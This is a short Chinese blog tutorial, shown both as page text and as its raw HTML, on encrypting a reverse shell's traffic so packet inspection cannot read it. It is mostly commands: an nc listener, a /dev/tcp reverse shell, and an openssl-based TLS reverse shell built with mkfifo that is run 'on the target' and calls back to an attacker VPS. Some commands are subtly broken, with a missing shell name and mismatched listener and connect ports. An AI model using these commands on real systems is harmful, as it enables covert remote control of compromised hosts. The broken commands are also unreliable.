加密基于TCP通信的shell

博主： literature
发布时间：2019 年 09 月 11 日
136 次浏览
关闭评论
655字数
分类：主机教程

环境说明

公网服务器一台
kali （内网）

简单的测试

在公网服务器执行命令

 nc -lvvp 4444

kali中执行命令

   -i >& /dev/tcp/公网ip/5555 0>&1

启动Wireshark开启抓包，分析流量。

测试

我们在终端中随便输入一条命令ifconfig,然后到Wireshark中查看。

我们可以清楚的看到，终端流量是通过明文传送。那么如何保证安全呢，这需要我们对明文流量加密处理。

openssl加密传输

第一步，在vps上生成SSL证书的公钥/私钥对

openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes

第二步，在VPS监听反弹shell

openssl s_server -quiet -key key.pem -cert cert.pem -port 4433

第三步，在目标上用openssl加密反弹shell的流量

mkfifo /tmp/s;/bin/  -i < /tmp/s 2>&1|openssl s_client -quiet -connect vps:443 > /tmp/s;rm /tmp/s

流量已经被加密。

版权属于：逍遥子大表哥

本文链接：https://blog.bbskali.cn/1385.html

按照知识共享署名-非商业性使用 4.0 国际协议进行许可，转载引用文章应遵循相同协议。

最后修改：2023 年 08 月 04 日

© 允许规范转载

如果觉得我的文章对你有用，请随意赞赏

此处评论已关闭

加密基于TCP通信的shell

literature • 2019 年 09 月 11 日

<h1>环境说明</h1><ul>
 <li>公网服务器一台</li>
 <li>kali （内网）</li>
</ul><p><img src="https://blog.bbskali.cn/usr/uploads/2019/09/3465673474.jpg" alt="未标题-1.jpg" title="未标题-1.jpg" style="" class="aligncenter"style=""></p><h3>简单的测试</h3><p>在公网服务器执行命令</p><pre><code> nc -lvvp 4444</code></pre><p><strong>kali</strong>中执行命令</p><pre><code>   -i >& /dev/tcp/公网ip/5555 0>&1</code></pre><p>启动<code>Wireshark</code>开启抓包，分析流量。</p><h3>测试</h3><p>我们在终端中随便输入一条命令<code>ifconfig</code>,然后到<code>Wireshark</code>中查看。<br /><img src="https://blog.bbskali.cn/usr/uploads/2019/09/2134493951.png" alt="QQ截图20190911130844.png" title="QQ截图20190911130844.png" style="" class="aligncenter"style=""><br /><img src="https://blog.bbskali.cn/usr/uploads/2019/09/2359158947.png" alt="QQ截图20190911131150.png" title="QQ截图20190911131150.png" style="" class="aligncenter"style=""><br />我们可以清楚的看到，终端流量是通过明文传送。那么如何保证安全呢，这需要我们对明文流量加密处理。</p><h3>openssl加密传输</h3><p>第一步，在vps上生成SSL证书的公钥/私钥对</p><pre><code>openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes</code></pre><p>第二步，在VPS监听反弹shell</p><pre><code>openssl s_server -quiet -key key.pem -cert cert.pem -port 4433</code></pre><p>第三步，在目标上用openssl加密反弹shell的流量</p><pre><code>mkfifo /tmp/s;/bin/  -i < /tmp/s 2>&1|openssl s_client -quiet -connect vps:443 > /tmp/s;rm /tmp/s</code></pre><p><img src="https://blog.bbskali.cn/usr/uploads/2019/09/2145954796.png" alt="QQ截图20190911131150.png" title="QQ截图20190911131150.png" style="" class="aligncenter"style=""></p><p>流量已经被加密。</p><iframe class="iframe_video" src="//player.bilibili.com/player.html?aid=67541735&cid=117103398&page=1" scrolling="no" border="0" frameborder="no" framespacing="0" allowfullscreen="true"> </iframe><p><hr class="content-copyright" style="margin-top:50px"></p><div class="post-copyright" style="font-style:normal"><p class="iconfont-copyright"><i class="glyphicon glyphicon-copyright-mark"></i></p><p class="content-copyright">版权属于：逍遥子大表哥</p><p class="content-copyright">本文链接：https://blog.bbskali.cn/1385.html</p><p class="content-copyright">按照知识共享署名-非商业性使用 4.0 国际协议进行许可，转载引用文章应遵循相同协议。</p></div>